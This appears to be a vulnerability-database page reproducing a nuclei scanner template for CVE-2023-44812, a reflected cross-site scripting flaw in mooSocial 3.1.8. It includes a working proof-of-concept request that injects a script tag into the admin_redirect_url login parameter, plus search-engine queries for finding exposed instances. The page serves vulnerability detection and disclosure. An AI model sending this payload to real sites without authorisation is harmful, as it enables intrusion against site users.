Lucene search
K

mooSocial v.3.1.8 - Cross-Site Scripting

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 39 Views

mooSocial v.3.1.8 - Cross-Site Scripting vulnerability allows remote code execution via crafted payload in admin_redirect_url parameter of user login functio

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Cross-site Scripting in Moosocial
26 Sep 202315:47
githubexploit
ATTACKERKB
CVE-2023-44812
9 Oct 202321:15
attackerkb
Circl
CVE-2023-44812
10 Oct 202300:16
circl
CNNVD
mooSocial Cross-Site Scripting Vulnerability
9 Oct 202300:00
cnnvd
CVE
CVE-2023-44812
9 Oct 202300:00
cve
Cvelist
CVE-2023-44812
9 Oct 202300:00
cvelist
NVD
CVE-2023-44812
9 Oct 202321:15
nvd
OSV
CVE-2023-44812
9 Oct 202321:15
osv
Prion
Cross site scripting
9 Oct 202321:15
prion
Positive Technologies
PT-2023-29300 · Moosocial · Moosocial
9 Oct 202300:00
ptsecurity
Rows per page
id: CVE-2023-44812

info:
  name: mooSocial v.3.1.8 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    A cross-site Scripting (XSS) vulnerability in mooSocial v.3.1.8 allows a remote attacker to execute arbitrary code by sending a crafted payload to the admin_redirect_url parameter of the user login function.
  impact: |
    Allows attackers to execute malicious scripts in the context of a user's browser session.
  remediation: |
    Apply the vendor-supplied patch or upgrade to a version that addresses the XSS vulnerability.
  reference:
    - https://github.com/nomi-sec/PoC-in-GitHub
    - https://github.com/ahrixia/CVE-2023-44812
    - https://nvd.nist.gov/vuln/detail/CVE-2023-44812
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-44812
    cwe-id: CWE-79
    epss-score: 0.01913
    epss-percentile: 0.77337
    cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: moosocial
    product: moosocial
    shodan-query: "http.favicon.hash:\"702863115\""
    fofa-query: "icon_hash=\"702863115\""
  tags: cve2023,cve,moosocial,xss,vuln
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        part: body
        words:
          - "mooSocial"
        internal: true
        case-insensitive: true

  - method: GET
    path:
      - "{{BaseURL}}/admin/home/login?admin_redirect_url=aHR0cDovL2xvY2FsaG9zdC9tb29zb2NpYWwvYWRtaW4vcGx1Z2lucw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3etest"

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "text/html")'
          - 'contains(body, "<script>alert(document.domain)</script>")'
        condition: and
# digest: 4a0a00473045022100f5fc29453bee6df8133e66030432227edb932d91bb1078272a6fe9aad7689e91022010373fc57780e166858d90720ad787702e8f85c243387a0f6dd4aecceddcac75:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 3.16.1
EPSS0.01913
SSVC
39